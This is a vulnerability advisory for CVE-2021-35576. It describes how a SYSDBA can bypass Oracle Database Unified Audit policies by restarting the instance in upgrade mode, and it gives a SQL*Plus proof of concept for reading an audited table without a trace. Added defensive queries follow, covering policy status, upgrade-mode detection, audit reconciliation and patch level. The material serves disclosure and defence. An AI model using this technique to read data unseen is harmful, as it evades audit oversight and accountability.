Oracle Unified Audit Policy Bypass
Oracle versions 12.1.0.2, 12.2.0.1, and 19c suffer from a Unified Audit Policy bypass vulnerability.
Title: CVE-2021-35576 – Oracle Database Unified Audit Policy Bypass
Product: Database
Manufacturer: Oracle
Affected Version(s): 12.1.0.2, 12.2.0.1, 19c
Tested Version(s): 19c
Risk Level: low
Solution Status: Fixed
Manufacturer Notification: 2021-03-17
Solution Date: 2021-10-17
Public Disclosure: 2022-06-11
CVE Reference: CVE-2021-35576
Author of Advisory: Emad Al-Mousa

*****************************************

Overview:

Oracle Database is a general purpose relational database management system (RDBMS). Unified Auditing is the supported mechanism for capturing database audit logs. The unified audit trail collects audit information from a variety of sources. It resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, is exposed in a uniform format through the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN or AUDIT_VIEWER role can query this view. Users who only need to query the view, and not create audit policies, should be granted AUDIT_VIEWER only.

*****************************************

Vulnerability Details:

The vulnerability allows a database administrator or system administrator with access to the database server (either a local login or remote authentication) to bypass a custom audit policy defined in the database. Starting the database in upgrade mode (STARTUP UPGRADE) disables unified auditing, so a threat actor with SYSDBA privileges can read audited objects without leaving a trace in the unified audit trail.

*****************************************

Proof of Concept (PoC):

I will create a table in pluggable database PDB1 under the HR schema and insert a few records:

SQL> CREATE TABLE HR.EMPLOYEE( FIRST_NAME VARCHAR2(50), LAST_NAME VARCHAR2(50));
SQL> INSERT INTO HR.EMPLOYEE ( FIRST_NAME, LAST_NAME) VALUES ( 'EMAD','MOUSA' );
SQL> commit;
SQL> INSERT INTO HR.EMPLOYEE ( FIRST_NAME, LAST_NAME) VALUES ( 'SAMI','MOUSA' );
SQL> commit;

I will now create an audit policy that records every SELECT on the table and enable it:

SQL> CREATE AUDIT POLICY SELECT_P1 ACTIONS SELECT ON HR.EMPLOYEE;
SQL> AUDIT POLICY SELECT_P1;

To check the audit policies enabled in PDB1:

SQL> SELECT * FROM audit_unified_enabled_policies;

Now, let us simulate executing a SELECT against the monitored/audited table while the database is in upgrade mode:

sqlplus / as sysdba
SQL> alter session set container=PDB1;
SQL> shutdown immediate;
SQL> startup upgrade;
SQL> select * from HR.EMPLOYEE;
SQL> startup force;
SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;

Checking the audit logs with the following query, NO entry for the SELECT is found in the unified audit trail:

SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME='EMPLOYEE' order by EVENT_TIMESTAMP desc;

So, even though an audit policy was configured in the database, a DBA/system administrator can view the audited sensitive table without a trace: no record is written to the UNIFIED_AUDIT_TRAIL view. Note that the bypass requires two instance restarts (one into upgrade mode, one back to normal), so an unexplained restart is the only footprint this technique leaves.

*****************************************

References:

https://www.oracle.com/security-alerts/cpuoct2021.html
https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/
https://nvd.nist.gov/vuln/detail/CVE-2021-35576

Credit:

Emad Al-Mousa: CVE-2021-35576
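The following checks are an added example, not part of the original advisory or of Oracle's own tooling. They are meant to be run by a DBA or auditor inside the PDB to confirm that the policy from the PoC is in force, to spot an instance that is currently running in upgrade mode, to reconcile the audited SELECTs on HR.EMPLOYEE against the last instance startup, and to list the applied SQL patches so the October 2021 CPU level can be verified. The policy name SELECT_P1 and the table HR.EMPLOYEE are taken from the PoC above; everything else (view and column names) is standard Oracle data dictionary content.

```sql
-- Added example: compensating checks for the upgrade-mode audit bypass.
-- Run as a user holding AUDIT_VIEWER (or AUDIT_ADMIN) inside PDB1.

-- 1. Unified Auditing must actually be enabled; expect VALUE = 'TRUE'.
SELECT parameter, value
  FROM v$option
 WHERE parameter = 'Unified Auditing';

-- 2. The PoC policy must be enabled for the intended users (ENTITY_NAME
--    'ALL USERS' when it was enabled without a BY/EXCEPT clause).
SELECT policy_name, enabled_option, entity_name, success, failure
  FROM audit_unified_enabled_policies
 WHERE policy_name = 'SELECT_P1';

-- 3. STATUS = 'OPEN MIGRATE' means the instance was started with
--    STARTUP UPGRADE: the state in which the PoC reads the table unaudited.
--    A normally opened instance reports STATUS = 'OPEN'.
SELECT instance_name, status, startup_time
  FROM v$instance;

-- 4. Audited SELECTs on the sensitive table since the last startup. Every
--    restart is a candidate bypass window, so a restart that is not explained
--    by a change record and shows no activity here should be reconciled
--    against the alert log and OS login records.
SELECT event_timestamp, dbusername, os_username, userhost,
       client_program_name, action_name, unified_audit_policies, sql_text
  FROM unified_audit_trail
 WHERE object_schema = 'HR'
   AND object_name   = 'EMPLOYEE'
   AND action_name   = 'SELECT'
   AND event_timestamp >= (SELECT startup_time FROM v$instance)
 ORDER BY event_timestamp DESC;

-- 5. Patch level: the fix ships in the October 2021 Critical Patch Update
--    (see References). Check that a Release Update at or after that CPU
--    has been applied successfully.
SELECT patch_id, description, status, action_time
  FROM dba_registry_sqlpatch
 ORDER BY action_time DESC;
```

Queries 1 to 3 are point-in-time checks and are cheap enough to schedule; query 4 is the detection query from the PoC generalized to the policy's full column set and bounded by the current startup time, so that a window of silence immediately after a restart stands out.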
Related news
Oracle Database versions 12.1.0.2, 12.2.0.1, 18c, and 19c suffer from a vault metadata exposure vulnerability.
Vulnerability in the Oracle Database Enterprise Edition Unified Audit component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1 and 19c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with network access via Oracle Net to compromise Oracle Database Enterprise Edition Unified Audit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database Enterprise Edition Unified Audit accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).